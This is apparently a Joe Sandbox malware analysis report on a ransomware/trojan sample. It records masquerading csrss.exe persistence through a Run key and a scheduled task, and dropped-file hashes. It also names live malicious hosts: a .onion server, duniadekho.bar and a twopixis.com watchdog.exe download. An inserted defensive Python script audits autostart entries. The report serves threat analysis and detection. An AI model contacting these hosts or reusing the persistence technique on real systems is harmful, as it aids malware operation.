                                            https://www.cloudflare.com/5xx-error-landingcsrss.exe, 00000014.00000003.213015103821.000000000C5F2000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213019914167.000000000C460000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211840953641.000000000C45E000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.209403091208.000000000C5F0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.209393805620.000000000C6D8000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210667163276.000000000C5EE000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213017192448.000000000C544000.00000004.00001000.00020000.00000000.sdmpfalse
                                              high
                                              https://www.cloudflare.com/5xx-errorcsrss.exe, 00000014.00000003.209403091208.000000000C5F0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                high
                                                http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionhttp://server5.vcr4vuv4csrss.exe, 00000014.00000003.213018868802.000000000C4AA000.00000004.00001000.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.zlib.net/csrss.exefalse
                                                  high
                                                  https://server5.duniadekho.barcsrss.exe, 00000014.00000003.210653914185.000000000C90E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  http://www.google.com/feedfetcher.html)HKLMkdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.zlib.net/Dcsrss.exe, 00000014.00000003.210662530760.000000000C6C6000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210662422652.000000000C6D6000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      high
                                                      https://api.sec-tunnel.com/v4/device_generate_passwordinternalcsrss.exe, 00000014.00000003.210616758241.000000000D754000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210641444415.000000000C9BC000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211820907766.000000000CE1E000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210640405754.000000000D234000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000035.00000002.209188988689.00000000709CD000.00000020.00000001.01000000.00000010.sdmpfalse
                                                        high
                                                        https://blockchain.infoindexcsrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://server5.duniadekho.bar/api/signature/csrss.exe, 00000014.00000003.209395939200.000000000C624000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        http://www.avantbrowser.com)MOT-V9mm/00.62kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        low
                                                        https://server5.duniadekho.barHcsrss.exe, 00000014.00000003.210658786957.000000000C805000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onioncsrss.exe, 00000014.00000003.213018868802.000000000C4AA000.00000004.00001000.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        http://www.xmlspy.com)powershell.exe, 00000035.00000002.209088197993.000000006BC32000.00000020.00000001.01000000.00000012.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        low
                                                        https://twopixis.com/watchdog/watchdog.exeno-storecsrss.exe, 00000014.00000003.213018965141.000000000C48C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        http://localhost:3433/https://duniadekho.baridna:kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: safe
                                                        low
                                                        http://search.msn.com/msnbot.htm)pkcs7:kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          high
                                                          https://duniadekho.barTransfer-Encodingtworkpollcsrss.exe, 00000014.00000003.213018965141.000000000C48A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
Joe Sandbox Version: 37.1.0 Beryl
Analysis ID: 877005
Start date and time: 2023-05-28 11:28:20 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 21m 24s
Hypervisor based Inspection enabled: false
Report type: light
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
Number of new started processes analysed: 85
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: kdsyitkxmS.exe
Detection: MAL
Classification: mal100.rans.troj.evad.winEXE@111/94@10/15
EGA Information: Failed
HDC Information:
• Successful, ratio: 100% (good quality ratio 48%)
• Quality average: 40.1%
• Quality standard deviation: 44.2%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, RuntimeBroker.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.93.58.141
• Excluded domains from analysis (whitelisted): wd-prod-cp-eu-north-3-fe.northeurope.cloudapp.azure.com, spclient.wg.spotify.com, wdcpalt.microsoft.com, array611.prod.do.dsp.mp.microsoft.com, tile-service.weather.microsoft.com, array604.prod.do.dsp.mp.microsoft.com, ctldl.windowsupdate.com, wdcp.microsoft.com, wd-prod-cp.trafficmanager.net, disc601.prod.do.dsp.mp.microsoft.com
• Execution Graph export aborted for target csrss.exe, PID 2532 because there are no executed functions
• Execution Graph export aborted for target csrss.exe, PID 4840 because there are no executed functions
• Execution Graph export aborted for target csrss.exe, PID 6892 because there are no executed functions
• Execution Graph export aborted for target csrss.exe, PID 7120 because there are no executed functions
• Execution Graph export aborted for target csrss.exe, PID 768 because there are no executed functions
• Execution Graph export aborted for target csrss.exe, PID 8952 because there are no executed functions
• Execution Graph export aborted for target csrss.exe, PID 9120 because there are no executed functions
• Execution Graph export aborted for target kdsyitkxmS.exe, PID 4688 because there are no executed functions
• Execution Graph export aborted for target kdsyitkxmS.exe, PID 8716 because there are no executed functions
• Execution Graph export aborted for target tor.exe, PID 6028 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing network information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
Time      Type            Description
11:31:05  Autostart       Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run csrss "C:\Windows\rss\csrss.exe"
11:31:13  Autostart       Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run csrss "C:\Windows\rss\csrss.exe"
11:31:18  Task Scheduler  Run new task: csrss path: C:\Windows\rss\csrss.exe
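The three entries above are the persistence mechanism: a copy of the malware named csrss.exe in C:\Windows\rss is registered in the per-user Run key (recorded under both the 32-bit and 64-bit registry views) and as a scheduled task of the same name. csrss.exe is a legitimate Windows process name, but the genuine binary lives in C:\Windows\System32 and is started by smss.exe, never from a Run key or a task, and C:\Windows\rss is not a Windows directory. The Python script below is an added example, not part of the Joe Sandbox report: it evaluates autostart records of the shape listed above and flags any whose image carries a session-chain binary name, distinguishing a path masquerade from a registration of the real binary. The three REPORT_ENTRIES are constructed from the table; the OneDrive control entry, its path and the contents of SESSION_CHAIN_BINARIES are assumptions for illustration.

```python
"""Audit autostart entries for system-process-name masquerading.

Added example, not part of the Joe Sandbox report. The entries below are
constructed from the report's autostart table plus one benign control.
"""
import ntpath
from dataclasses import dataclass
from typing import List, Optional

# Core Windows processes started by the boot/session chain
# (smss.exe -> csrss.exe/wininit.exe -> services.exe/lsass.exe ...).
# None of them is ever legitimately registered in a Run key or a task.
# (Assumed list for illustration.)
SESSION_CHAIN_BINARIES = {
    "smss.exe", "csrss.exe", "wininit.exe", "winlogon.exe",
    "services.exe", "lsass.exe",
}
SYSTEM32_DIR = r"c:\windows\system32"


@dataclass(frozen=True)
class AutostartEntry:
    source: str    # "Run" (registry) or "Task Scheduler"
    location: str  # registry key path or task name
    name: str      # value name or task name
    command: str   # command line exactly as recorded


def image_path(command: str) -> str:
    """Extract the executable path from a command line.

    A quoted path ("C:\\Program Files\\x.exe" /arg) is taken up to the
    closing quote; otherwise the first whitespace-delimited token is used.
    """
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(maxsplit=1)[0] if command else ""


def audit(entry: AutostartEntry) -> Optional[str]:
    """Return a finding for a masquerading entry, or None if it looks normal."""
    image = image_path(entry.command).lower()
    base, directory = ntpath.basename(image), ntpath.dirname(image)
    if base not in SESSION_CHAIN_BINARIES:
        return None
    if directory != SYSTEM32_DIR:
        # Same name as a protected binary, but loaded from elsewhere.
        return (f"{entry.source} '{entry.name}' ({entry.location}) starts {base} "
                f"from {directory}; the genuine binary lives in {SYSTEM32_DIR}")
    # Correct path, but this process is never started via an autostart entry.
    return (f"{entry.source} '{entry.name}' ({entry.location}) registers {base} "
            f"for autostart; this process is never started that way")


def audit_all(entries: List[AutostartEntry]) -> List[str]:
    return [f for f in (audit(e) for e in entries) if f]


# Constructed from the report's autostart table.
REPORT_ENTRIES = [
    AutostartEntry("Run", r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
                   "csrss", r'"C:\Windows\rss\csrss.exe"'),
    AutostartEntry("Run", r"HKCU64\Software\Microsoft\Windows\CurrentVersion\Run",
                   "csrss", r'"C:\Windows\rss\csrss.exe"'),
    AutostartEntry("Task Scheduler", "csrss", "csrss", r"C:\Windows\rss\csrss.exe"),
]
# Constructed benign control (hypothetical path): an ordinary user-land autostart.
BENIGN_ENTRY = AutostartEntry(
    "Run", r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "OneDrive",
    r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background')


if __name__ == "__main__":
    for finding in audit_all(REPORT_ENTRIES + [BENIGN_ENTRY]):
        print(finding)
```

On a live host the same records can be collected with `Get-ItemProperty` on the Run keys and `Get-ScheduledTask`, then fed to `audit` unchanged; the check is on the image path alone, so it also catches the `HKCU64` duplicate that a 32-bit-only query would miss.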
                                                          No context
Process:C:\Windows\rss\csrss.exe
File Type:MS-DOS executable PE32+ executable (DLL) (EFI application) x86-64, for MS Windows
Category:dropped
Occurrences:4 (identical content and hashes; the four drop paths are not preserved in this extract)
Size (bytes):7680
Entropy (8bit):4.486535052248291
Encrypted:false
SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
MD5:17ACB515B5FA45DEF030B191E5BC7991
SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZ......................................................................................................................................................................................................PE..d................." .........................................................`.......!.......................................................................0...............P......<#...............................................................................text............................... ..h.data........ ......................@....pdata.......0......................@..H.xdata.......@......................@..B.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\rss\csrss.exe
File Type:MS-DOS executable PE32+ executable (DLL) (EFI runtime driver) x86-64, for MS Windows
Category:dropped
Size (bytes):279552
Entropy (8bit):4.553173975914215
Encrypted:false
SSDEEP:3072:ekODsOuozgl9aXsRzZZZZrUhFapDL4k2yntc:ekeklesRD6yt
MD5:2B84CB96AE6280C2020FA46E4A8A07D8
SHA1:E920E40CFC0C6A805D657C8F23F9C0612CD39F59
SHA-256:01E86A4DFE6E0DE7857B3CF2FAFD041C8B3A3241E00844CB6BFBD3BFAE2D36BC
SHA-512:F1A6598116F78FBA1F9531301A7313AC204BAB3B7AEBC299F69F2ED406F4EDAFC3410DB860E93D0DC7C24398F5A7FF595764400F31A3A06679FD6EC0EFB116D9
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZ..............................................................................................................................................................................................PE..d................." ................x........................................................................................................................P...............p.......................................................................................text.............................. ..h.data..............................@....pdata.......P.......8..............@..H.xdata..X....`.......<..............@..B.reloc.......p.......B..............@..B........................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2148
                                                          Entropy (8bit):5.357107632174724
                                                          Encrypted:false
                                                          SSDEEP:48:kfWSGfs4c4RQmFoUefamfgZ9tK8NPb17Iu1iMugegyV/gXdUyugHc:kfLGHcIFKLfbIZ2KRLugrgg8
                                                          MD5:87B7FE779C0D77A128E368629B44A4E4
                                                          SHA1:8866E5A32F6013F6699A06DD67237DF174A6E26D
                                                          SHA-256:EE4A626195B52599B25E50A1578BEAA0EBCECF1832DA1789201B8C53119A1A26
                                                          SHA-512:779454332D671B186C23648CBA6F1B7C690705EB60CBA95B99037920C14B9BEDD92BCC719E3FC95D06CB42D8B1164CD27497875226278721C8A011E4B2E746FD
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:@...e.......................E.D.D.......'.......................P................1]...E.....^.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0...............I.....B..ZR............System..4......................A....E..........System.Core.D................g$H..K..I.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4..................%`99B....9...........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):101376
                                                          Entropy (8bit):5.951577458824018
                                                          Encrypted:false
                                                          SSDEEP:3072:U3JJpaHtGsxJZ7zmaUMf2ETb4w1GMYbuT:csTF5U3EfndT
                                                          MD5:09031A062610D77D685C9934318B4170
                                                          SHA1:880F744184E7774F3D14C1BB857E21CC7FE89A6D
                                                          SHA-256:778BD69AF403DF3C4E074C31B3850D71BF0E64524BEA4272A802CA9520B379DD
                                                          SHA-512:9A276E1F0F55D35F2BF38EB093464F7065BDD30A660E6D1C62EED5E76D1FB2201567B89D9AE65D2D89DC99B142159E36FB73BE8D5E08252A975D50544A7CDA27
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 88%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b..............k......k......k..r...w......w......w......k............. w...... w...... w......Rich............PE..d...o.D`.........." ................$/....................................................`..................................................g..(...............p...............<....W..8...........................@W..8............................................text............................... ..`.rdata.............................@..@.data................d..............@....pdata..p............p..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..<...........................@..B................................................................................................................................................................................................................
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):288256
                                                          Entropy (8bit):6.31266455792162
                                                          Encrypted:false
                                                          SSDEEP:3072:qbHszDaOJ8u2HHFIWr6e29kOnK7qFQ8wMii5I7kGvNjzMuszHshoY46bEydJ+dK9:SA3IlIA6e29vngqS8wMmuooh8z+8F
                                                          MD5:D98E33B66343E7C96158444127A117F6
                                                          SHA1:BB716C5509A2BF345C6C1152F6E3E1452D39D50D
                                                          SHA-256:5DE4E2B07A26102FE527606CE5DA1D5A4B938967C9D380A3C5FE86E2E34AAAF1
                                                          SHA-512:705275E4A1BA8205EB799A8CF1737BC8BA686925E52C9198A6060A7ABEEE65552A85B814AC494A4B975D496A63BE285F19A6265550585F2FC85824C42D7EFAB5
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 92%
                                                          Reputation:unknown
